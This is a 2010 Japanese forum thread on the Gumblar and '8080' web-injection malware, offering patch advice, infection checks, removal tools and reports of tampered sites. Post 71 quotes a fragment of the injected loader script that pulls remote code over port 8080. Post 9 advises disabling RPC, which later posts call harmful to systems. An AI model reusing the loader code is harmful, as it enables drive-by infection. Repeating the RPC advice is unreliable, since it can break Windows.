2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】

1 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:38:38
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合ス2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/


2 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:41:55
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic


3 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:43:19
【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/


4 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:44:56
【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/


5 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:47:09
【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください

セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済

上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します


6 : ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄:2010/01/19(火) 10:49:01
                             iヽ、
                            ミ ヽヽ、
                           ,,,ミ  ),,,,\
‐- ...,,__       カチカチ         / ,,;;;;;;;;;;  "''-、
     ~""''' ‐- ...,,__          /,, ,,;;; ;;;;;;''''__,,_,.-'''"l、
           ____,,,,,,,,,,,, -------/●);;;; ,;;'''   彡  l ,!
⌒ヽ、   _,,-‐‐‐f,"  ;; ;;; ''  ;;;;彡三;_/  ''      彡 ノ ,,l
   ヽ、八  \`(,,,,,,,,,イ''''ー、,;;;;;;;   ((,,,,,..   (●>,    __/'';;;;!
     ヽ`---ー‐‐―‐ン     '''-l ( ,.,.,    ,;;,,   '';;;;;;,,,,/
        ̄ ̄ ̄ ̄ ̄         l  メ//l '';,,,;;'';; '';;; ';, '';:;/
"''- .._                 | / /メ、|';,,,,,'''';;;;;;;;;;;;;; ン;ヽ
     '''- .._     ____,,,,,,,,,,,,,,-'''''  ;;;;;;;;;;;`;-;;;-;;;;-;;-; ;;; ;;;l"
 /  ,   ,  "'''- .. f-''   ;; ;; '';;;;; ''' ;;;;;;;;;;;;;;;;;;;;;;;;;_ ;;;;;;;;;;;;;l
/   /  /  /   // (⌒  ;; ;; '';;;;; ''' ;; ;;;;;;;;;;;;;;   ;;;;;;;;;;;;;|
   /  /  /   //  `''''-、;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;;  ,,,,  ;;;;;;;;;;l

7 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:49:07
GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する


8 : ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄:2010/01/19(火) 10:49:44
                             iヽ、
                            ミ ヽヽ、
                           ,,,ミ  ),,,,\
‐- ...,,__       カチカチ         / ,,;;;;;;;;;;  "''-、
     ~""''' ‐- ...,,__          /,, ,,;;; ;;;;;;''''__,,_,.-'''"l、
           ____,,,,,,,,,,,, -------/●);;;; ,;;'''   彡  l ,!
⌒ヽ、   _,,-‐‐‐f,"  ;; ;;; ''  ;;;;彡三;_/  ''      彡 ノ ,,l
   ヽ、八  \`(,,,,,,,,,イ''''ー、,;;;;;;;   ((,,,,,..   (●>,    __/'';;;;!
     ヽ`---ー‐‐―‐ン     '''-l ( ,.,.,    ,;;,,   '';;;;;;,,,,/
        ̄ ̄ ̄ ̄ ̄         l  メ//l '';,,,;;'';; '';;; ';, '';:;/
"''- .._                 | / /メ、|';,,,,,'''';;;;;;;;;;;;;; ン;ヽ
     '''- .._     ____,,,,,,,,,,,,,,-'''''  ;;;;;;;;;;;`;-;;;-;;;;-;;-; ;;; ;;;l"
 /  ,   ,  "'''- .. f-''   ;; ;; '';;;;; ''' ;;;;;;;;;;;;;;;;;;;;;;;;;_ ;;;;;;;;;;;;;l
/   /  /  /   // (⌒  ;; ;; '';;;;; ''' ;; ;;;;;;;;;;;;;;   ;;;;;;;;;;;;;|
   /  /  /   //  `''''-、;;;;,,,;;;,,,;;;;;,,;;;;;;;;;; ;;;;;;;;;;;  ,,,,  ;;;;;;;;;;l

9 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:50:51
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja

10 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:52:12
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除


11 :名無しさん@お腹いっぱい。:2010/01/19(火) 10:54:02
*** テンプレ終了 ***

12 :名無しさん@お腹いっぱい。:2010/01/19(火) 11:18:14
新スレはこちらへ

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263822552/

13 :あげ:2010/01/28(木) 21:06:06
>>12を訂正
http://pc11.2ch.net/test/read.cgi/sec/1263822552/
からの続きで使用して下さい。

14 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:11:50
>>5
>>10
最近の亜種には役に立ちそうもないが一応

【感染確認】
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

15 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:13:36
【改ざんWebサイトの届出先】
■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/

16 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:14:42
【改ざんサイトの調査など】
■ チェッカーサイト
・Gumblar Checker 2
ttp://gumblarchecker.crz.jp/
・aguse
ttp://www.aguse.net/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView

設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblarchecker.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK

17 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:21:37
>>15の補足
メールで該当サイトに通報する時は
CCにJPCERT/CCのメアドも入れると二度手間が省けるよん

18 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:27:34
So-netセキュリティ通信
ttp://www.so-net.ne.jp/security/

執筆している会社(株式会社 現代フォーラム)
http://www.gendai-forum.jp/page/sec.html

19 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:31:37
直近の要点だけまとめてみた
----------
■Exceptionが「/*・・・*/」無しの「DEBUG」に絶賛進化中。
※最新型は前スレ925氏が「DEBUG」と命名。

■あばすと、かすぺ、農怒は「DEBUG」の検体提出済。
※他の提出状況はしらん(報告待ち中)


■検索ワード:".replace(/\(|#|@|&|\^|\$|\)|\!/ig,"

・やふー
ttp://search.yahoo.co.jp/search?p=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&ei=UTF-8&meta=fl%3D3&pstart=1&fr=top_ga1_sa&b=1

・えきさいと
ttp://www.excite.co.jp/search.gw?search=%22.replace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&submit=%8C%9F%8D%F5&target=combined&look=excite_jp&sstype=excite_d
※Googleセンセイは捜索に向かない(やってみればわかる)


20 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:38:35
>>19
びんぐ
ttp://www.bing.com/search?q=%22%2Ereplace%28%2F%5C%28%7C%23%7C%40%7C%26%7C%5C%5E%7C%5C%24%7C%5C%29%7C%5C%21%2Fig%2C%22&filt=all

21 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:50:28
もう新種の出が早すぎて、どういう環境で感染するのは全く分からないな・・・

22 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:58:12
Googleだと日付が表示できるから検索できれば便利なんだけどな

23 :名無しさん@お腹いっぱい。:2010/01/28(木) 21:59:03
★★★警告! 試すな危険★★★

>>9の2件は【ルータ】未導入の人用です。
前スレで、安易に手を出した初心者によるトラブルが続出しています。

(どうしても試したい人のための、症状例と救済レジストリ操作等)★保障なし★
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
ttp://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html

24 :名無しさん@お腹いっぱい。:2010/01/28(木) 22:18:39
今更質問だけど
8080系とか、GumblarにPCが感染すると具体的にどういう症状が出るの?

25 :名無しさん@お腹いっぱい。:2010/01/28(木) 22:31:33
ボットネットに組み込まれ制御下におかれる。確定した症状は無い。
別な犯罪グループに切り売りされたり(CODE1が一部売られて別なコードになってる)
悪事の片棒担がされたりインチキセキュリティソフト売りつけられたり。

26 :名無しさん@お腹いっぱい。:2010/01/28(木) 22:35:24
>>24
表面上何も異常がなくても
ある日突然警察がきてPC押収されるかもしれない

27 :名無しさん@お腹いっぱい。:2010/01/28(木) 22:43:38
Adobe系、JRE等各ソフトが最新、アンチウイルスソフトもこまめに定義更新したらほぼ大丈夫かな?

28 :名無しさん@お腹いっぱい。:2010/01/28(木) 22:46:51
>>27
大丈夫なんてとても言えない。
ブラウザのスクリプト切っておいてください。
あ、もちろんAdobeリーダーのJavascriptも切るんだよ。

29 :名無しさん@お腹いっぱい。:2010/01/28(木) 22:54:32
レッツ!テキストブラウジング!

30 :名無しさん@お腹いっぱい。:2010/01/28(木) 22:59:47
>>28
AdobeリーダーのJavascript、ブラウザでのPDF閲覧はチェック入れてない
IEだとJS関連が面倒そうだが信頼済みサイト機能使ってみるか


31 :名無しさん@お腹いっぱい。:2010/01/28(木) 23:05:03
対策は、基本的には>>7でいいと思う
それ以上のプラスアルファの対策は、各人の好みで自分の気が済むようにやればいい

32 :名無しさん@お腹いっぱい。:2010/01/28(木) 23:25:30
これってウイルス作ったやつが捕まらないと永遠に亜種が生まれるの?
それとも自動で亜種が生まれ続けているの?

33 :名無しさん@お腹いっぱい。:2010/01/28(木) 23:46:27
>>27
OSの更新も忘れないでね!

34 :名無しさん@お腹いっぱい。:2010/01/28(木) 23:47:20
>>32
作ってるやつが目的を達成するまで続く
自動でうまれることはない

35 :名無しさん@お腹いっぱい。:2010/01/29(金) 00:03:43
>>34
じゃあ作ってるやつが捕まれば終息に向かうってことか
でも誰が作ったんだろうね?
出所から察するにロシアの悪質プログラマーなんだろうけど…

36 :名無しさん@お腹いっぱい。:2010/01/29(金) 00:33:47
セキリュティソフトのベンダーがマッチポンプ・・・考え過ぎ?

37 :名無しさん@お腹いっぱい。:2010/01/29(金) 00:35:12
ウイルスこわいでちゅ

38 :名無しさん@お腹いっぱい。:2010/01/29(金) 00:35:49
任天堂がマジコン訴訟をとりさげるまで

39 :名無しさん@お腹いっぱい。:2010/01/29(金) 00:42:41
ロシアのドメインを使ってるからって作成者もロシアとは限らんし、
似たようなのを別の誰かが作るかもしれないし

40 :名無しさん@お腹いっぱい。:2010/01/29(金) 00:58:58
昔のコンピュータウイルスって可愛い動作のものも沢山あったよね
アウトルックでプレビューウインドウを開いているとで感染
載っているアドレスにスパムメールを送る位だったのに・・・

今はもうアドビば修正したのかも知れないけど
アドビの1ヶ月パッチ放置によって
アクロバット使用者が感染し、その人のブログ、HPが改竄され、
その改竄されたHPを踏むと、今度はそのユーザーブログが改竄され
個人情報まで抜かれるしまつ。

10年後にはどんな凶悪なウイルスが出てくるんだろ・・・

41 :名無しさん@お腹いっぱい。:2010/01/29(金) 01:00:37
穴探すやつ、ウイルス作るやつ、配布するやつ、
ドメイン手配するやつ、botのタスク受けるやつ
分業化してると想う、今はbotクラウドの構築段階じゃないかな

42 :名無しさん@お腹いっぱい。:2010/01/29(金) 01:10:47
昔のウィルスといえば普通にHDDのなかみ消したり
起動不能に陥らせてたりしてたとおもうが
5,6年前のは可愛いのおおかったがな

43 :名無しさん@お腹いっぱい。:2010/01/29(金) 01:18:12
俺ネット歴浅いからよく知らんけど
昔はアルプス一万尺が延々と流れてくるウイルスなんてのもあったみたいだね
AIがとまらないって漫画で見たことある
なんか、最近のウイルスはその漫画のラスボスのゼロスパイダーとかみたいなのが
現実に出てきてるみたいで怖い

44 :名無しさん@お腹いっぱい。:2010/01/29(金) 01:27:20
最近のウィルスはおそろしくなったな

45 :名無しさん@お腹いっぱい。:2010/01/29(金) 01:28:17
http://pc11.2ch.net/test/read.cgi/sec/1263822552/452
再発  /DEBUG/
例の上映会とこ。。。
前スレの人、またつーほーおながいします。

whois上流のとこ届かなかったみたいぽ。

46 :名無しさん@お腹いっぱい。:2010/01/29(金) 01:58:25
>>45
パスワードとか変えなかったのかよorz

47 :名無しさん@お腹いっぱい。:2010/01/29(金) 02:24:50
他人が書き換えるのをいたずら書きぐらいに思ってるんじゃないかな
異常な状態にあることをわかってもらう必要がありそう

48 :45:2010/01/29(金) 02:26:06
また届かないかもしれないけどwhois上流にめるはしてあります。

株式会社KDDIウェブコミュニケーションズの人ここ見てますかぁ〜

49 :名無しさん@お腹いっぱい。:2010/01/29(金) 04:35:23
【Gumblar】混ぜるな危険【8080系】

■Gumblar(たぶん消滅済)
2009/4〜6に猛威を振るったやつ。
GENOの対応の悪さが「GENOウイルス」という言葉を生み出した。

■Gumblar.x
2009/10〜12に出現。
挿入するコードがGumblarのそれと同じだった為、
Gumblarの進化型(亜種?)と言われていた。
Gumblar.xは12月中旬にコードごと消滅、以後追跡不能。
※残骸が残っているサイトがあるが、現在は基本的に無害。

■8080系(GNU GPL、CODE1、LGPL、Exception、DEBUG)
Gumblar.xが消滅した直後に出現し、今現在も猛威を振るっている。
※セキュリティソフト依存の防御は非常に危険です。

8080系は、Gumblar用の対策方法には載ってない
「Java(JRE)」の脆弱性を突いているので、Gumblarと8080系を混同して
Gumblar用の対策を施し、「これで大丈夫(キリッ」とか言ってると、
踏んだ地雷が爆発→→→ \(^o^)/オワタ なんて事に(なるかも?)

50 :名無しさん@お腹いっぱい。:2010/01/29(金) 05:42:02
>>49
乙age


51 :名無しさん@お腹いっぱい。:2010/01/29(金) 06:13:45
SymantecがFlashPlayerを誤検出
ttp://isc.sans.org/diary.html?storyid=8104

52 :名無しさん@お腹いっぱい。:2010/01/29(金) 07:14:39
>>9とか載せんなよ ハゲ

53 :名無しさん@お腹いっぱい。:2010/01/29(金) 07:28:41
>>9>>49を差し替えたほうが・・・

54 :名無しさん@お腹いっぱい。:2010/01/29(金) 07:33:53
スレたった日付をよく見ろハゲ

55 :名無しさん@お腹いっぱい。:2010/01/29(金) 07:58:03
>>27
JREもセキュリティホールになってたのか・・・orz
油断できないな・・・

56 :名無しさん@お腹いっぱい。:2010/01/29(金) 08:00:35
>>2-55はハゲ

57 :名無しさん@お腹いっぱい。:2010/01/29(金) 08:02:31
>>1-56はクズ

58 :名無しさん@お腹いっぱい。:2010/01/29(金) 08:04:55
関西の自主上映団体
ttp://www.rcsmovie.co●jp/

こんなん↓書いてありますけど?

一部のセキュリティソフトにおいて、
当ホームページへのアクセス遮断や、
感染警告の表示などが発生している様です。
早急な対応を試みておりますが、
じゅうぶんご注意ください。

59 :名無しさん@お腹いっぱい。:2010/01/29(金) 08:06:14
>>58
デジャビュ・・・いや既出だろそれ

60 :名無しさん@お腹いっぱい。:2010/01/29(金) 09:11:39
てs

61 :名無しさん@お腹いっぱい。:2010/01/29(金) 09:20:58
>>58
前スレ452と510で既出。

62 :名無しさん@お腹いっぱい。:2010/01/29(金) 09:51:00
コピペですいません。

北斗の更新切らしてしまって、なんかヘンなサイトを踏んでしまい、
トロイの木馬警告が出ましたんで、もう一回踏んでみたら、
マカフィー無料スキャンで「JS/Redirector.cに感染しました」と出ました。
そこでウイルスキラーゼロを買ってきて、スキャンさせても「感染0」
もう一度マカフィー無料スキャンをやってみても「感染0」になります。
これは感染しているのでしょうか?

63 :名無しさん@お腹いっぱい。:2010/01/29(金) 10:11:11
スレ違い

64 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:23:33
ttp://bb21.b2c-21●com/z1z00046/
ttp://kasim.kashima136●com/z19z00703/
みたいな/z△z00○○○/ってページがz1zからz19zまではあるし
(19x1000ページはあるんだろうね)

ttp://dingo.hichigosan●com/excessive-perspiration-japan/
ttp://dooon.konrei●org/foreign-exchange-japan/
みたいに最後にjapanのつくページとか山ほどあるよね。
どうにもならんよね

65 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:27:27
>>9
前スレから転載
----------
669 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:49:48

素人はRPCを絶対いじるな
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
ttp://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html
----------

   ハ,,..,,ハ
  /;;・ω・;;ヽ 
.  (;( ^^^ );)
  `'ー---‐´
トトロイ
(2010〜)


66 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:32:18
玄人ならRPCを止めてもちゃんと動く


67 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:38:48
>>64
tp://bb21.b2c-21●com以下の階層のページ 0件

tp://kasim.kashima136●com以下の階層のページ 31件

/z19z00701
/z19z00703
/z19z00705
/z19z00707
/z19z00710
/danjiki/
/hair/
/bust/
/bland/
面倒だから、以下略とす

68 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:48:28
今なら admachiko で検索すればいっぱい引っかかるよ。
こーゆーのどーすればいーのさ

69 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:51:14
それgumblarや8080と関係なくね

70 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:53:01
>>69
ソースみてみ


71 :名無しさん@お腹いっぱい。:2010/01/29(金) 11:54:57
>>68
DEBUGじゃない...

;document.write('<scr'+'ipt src=h'+'ttp://'+Xiabbjepv1.replace(/Widcfpac5ixzc/g, '8080')+'></scr'+'ipt>');} } catch(Xixc9uyr ) {}
http://apopo●apparelarc-xml●org/z1z00712/

72 :名無しさん@お腹いっぱい。:2010/01/29(金) 13:09:27
>>71
再改竄
park5●wakwak●com/~izushichi/mikura/index●html
ここは「.ru:Bxj118lelf/」になってる。

.ru:XXXXの部分は
何らかの法則、又はランダムで生成してるような希ガス

昨日のDEBUGは本当にDEBUGだったのか・・・

73 :名無しさん@お腹いっぱい。:2010/01/29(金) 13:55:42
あーmegaidもDEBUGもランダムになっちまったか…

74 :45:2010/01/29(金) 13:59:44
>>64,>>71
whoisみたら同じとこみたい、める一通しました。

>>72
あばばばば

75 :名無しさん@お腹いっぱい。:2010/01/29(金) 14:29:46
すみません
以前に>>9を見てポート445を閉じてしまったのですが
元に戻す場合には「スタートアップ」の種類を何に変更すればいいのでしょうか?

76 :名無しさん@お腹いっぱい。:2010/01/29(金) 14:37:06
うちはシステムになってるな


77 :名無しさん@お腹いっぱい。:2010/01/29(金) 15:52:09
>>75
うちもシステムになっているよ@XP SP2

78 :75:2010/01/29(金) 16:27:54
>>76>>77
どうもありがとうございます
自分のも確か最初はシステムだったなと思っていたので
システムにしてみます

79 :名無しさん@お腹いっぱい。:2010/01/29(金) 16:35:50
>>49
8080系ってJREを利用してるの?
adobeの更新がどうのこうの話題になってたけど。

80 :名無しさん@お腹いっぱい。:2010/01/29(金) 16:43:12
>>79
使う。Java6Update17未満だとやられる。
WindowsのもあるけどこれはWindowsUpdateで阻止できるので脅威ではない。

81 :名無しさん@お腹いっぱい。:2010/01/29(金) 17:35:57
JREってアップデートしても古いの残ったままだけど、
古いの削除しないとヤバイ?

82 :名無しさん@お腹いっぱい。:2010/01/29(金) 17:35:59
>>80
そこまで新しくなくても今のところは大丈夫
ダメなのは
JRE 6 Update 11未満
JRE 5.0 Update 17未満
JRE 1.4.2_19未満

あと8080系はクリスマス頃から未修整だったAdobe Readerの脆弱性を使うようになった。
ほかの攻撃内容は帰ってきたGumblar並みだったのに、
ここまでひどいことになったのはこの2つのおかげだと思う。

83 :名無しさん@お腹いっぱい。:2010/01/29(金) 17:38:56
心配ならとりあえずJAVAの実行を切っとけばいい。

84 :名無しさん@お腹いっぱい。:2010/01/29(金) 17:55:07
>>81
ttps://www.ccc.go.jp/detail/web/
企業などで特定のバージョンのJREを必要とする場合はありますが、
それ以外の場合では旧バージョンをアンインストールすることをお薦めします

85 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:01:37
www.rcsmovie.co●jp/index.html
凸完了

86 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:02:59
注入されるコードは頻繁に変わってるけど本体を呼び出すコードは何の変化もなしか・・

87 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:05:56
ガンブラーなんてゴミ箱ポイポイのポイよ

88 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:08:56
「プログラムの追加と削除」リストにJava Runtime Environmentが無いんだけど
これは入ってないってことでいいの?
ttp://www.java.com/ja/で確認したんだけど良く分からん

89 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:13:07
>>88
俺のところでは Java(TM) 6 Update 17 となってるな

90 :名無しさん@お腹いっぱい。:2010/01/29(金) 18:16:14
